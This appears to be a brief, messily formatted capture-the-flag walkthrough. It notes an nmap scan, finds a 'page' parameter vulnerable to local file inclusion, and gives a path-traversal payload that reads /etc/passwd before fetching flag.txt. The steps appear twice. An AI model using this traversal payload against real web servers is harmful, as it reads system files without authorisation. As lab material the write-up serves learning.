- nmap scan
| |
- resultS
| |
check web server
play around bit you will find page parameter is vulnerable to LFI
traverse enough to land in root
/=../../../../../../../../../../../..//etc/passwdnow flag.txt
| |
| |
check web server
play around bit you will find page parameter is vulnerable to LFI
traverse enough to land in root /
=../../../../../../../../../../../..//etc/passwd
now flag.txt